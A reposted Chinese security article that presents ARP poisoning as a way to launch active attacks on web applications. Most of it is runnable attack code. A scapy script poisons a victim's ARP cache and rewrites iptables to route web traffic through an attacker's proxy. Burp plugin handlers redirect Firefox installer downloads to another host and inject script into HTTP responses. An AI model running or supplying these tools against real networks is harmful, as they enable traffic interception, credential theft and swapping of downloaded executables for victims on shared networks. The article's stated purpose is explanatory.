转自:FreebuF.COM
ARP毒化攻击是一种比较老的攻击技术,是中间人攻击的一种途径。传统的攻击方法重点在于信息的收集(密码,Cookie,CSRF令牌等等任何信息)。有时这种攻击也用来对付通过SSL协议访问的目标。但是其中一个攻击途径我认为没有引起足够的重视,就是让中间人作为一个活跃的攻击点去攻击在各类Web应用。关于这种技术大部分的内容都能在网络上找到,但是使用的例子我认为都是零散的也不够完整。
from scapy.all import * import time import argparse import os import sys def arpPoison(args): conf.iface= args.iface pkt = ARP() pkt.psrc = args.router pkt.pdst = args.victim try: while 1: send(pkt, verbose=args.verbose) time.sleep(args.freq) except KeyboardInterrupt: pass #default just grabs the default route, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better #but this just works and people don't have to install external libs def getDefRoute(args): data = os.popen("/sbin/route -n ").readlines() for line in data: if line.startswith("0.0.0.0") and (args.iface in line): print "Setting route to the default: " + line.split()[1] args.router = line.split()[1] return print "Error: unable to find default route" sys.exit(0) #default just grabs the default IP, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better #but this just works and people don't have to install external libs def getDefIP(args): data = os.popen("/sbin/ifconfig " + args.iface).readlines() for line in data: if line.strip().startswith("inet addr"): args.proxy = line.split(":")[1].split()[0] print "setting proxy to: " + args.proxy return print "Error: unable to find default IP" sys.exit(0) def fwconf(args): #write appropriate kernel config settings f = open("/proc/sys/net/ipv4/ip_forward", "w") f.write('1') f.close() f = open("/proc/sys/net/ipv4/conf/" + args.iface + "/send_redirects", "w") f.write('0') f.close() #iptables stuff os.system("/sbin/iptables --flush") os.system("/sbin/iptables -t nat --flush") os.system("/sbin/iptables --zero") os.system("/sbin/iptables -A FORWARD --in-interface " + args.iface + " -j ACCEPT") os.system("/sbin/iptables -t nat --append POSTROUTING --out-interface " + args.iface + " -j MASQUERADE") #forward 80,443 to our proxy for port in args.ports.split(","): os.system("/sbin/iptables -t nat -A PREROUTING -p tcp --dport " + port + " --jump DNAT --to-destination " + args.proxy) parser = argparse.ArgumentParser() parser.add_argument('--victim', required=True, help="victim IP") parser.add_argument('--router', default=None) parser.add_argument('--iface', default='eth1') parser.add_argument('--fwconf', type=bool, default=True, help="Try to auto configure firewall") parser.add_argument('--freq', type=float, default=5.0, help="frequency to send packets, in seconds") parser.add_argument('--ports', default="80,443", help="comma seperated list of ports to forward to proxy") parser.add_argument('--proxy', default=None) parser.add_argument('--verbose', type=bool, default=True) args = parser.parse_args() #set default args if args.router == None: getDefRoute(args) if args.proxy == None: getDefIP(args) #do iptables rules if args.fwconf: fwconf(args) arpPoison(args)
from gds.burp.api import IProxyRequestHandler from gds.burp.core import Component, implements class ExamplePlugin(Component): implements(IProxyRequestHandler) def processRequest(self, request): if "Firefox%20Setup%20" in request.url.geturl() and ".exe" in request.url.geturl(): print "Firefox download detected, redirecting" request.host = "131.107.39.100" request.raw = ("GET /downloads/Firefox%20Setup%2013.0.1.exe HTTP/1.1\r\n" + "HOST: 131.107.39.100\r\n\r\n")
def processResponse(self, request): #very sloppy way to call only once, forcing exception on the first call try: self.attack += 1 except: script = "<script>alert(document.domain)</script>" #simply inject into the first </head> we see if "</head>" in request.response.raw: print "Beginning Injection..." print type(request.response.raw) request.response.raw = request.response.raw.replace("</head>", script + "</head>", 1) #self.attack = 1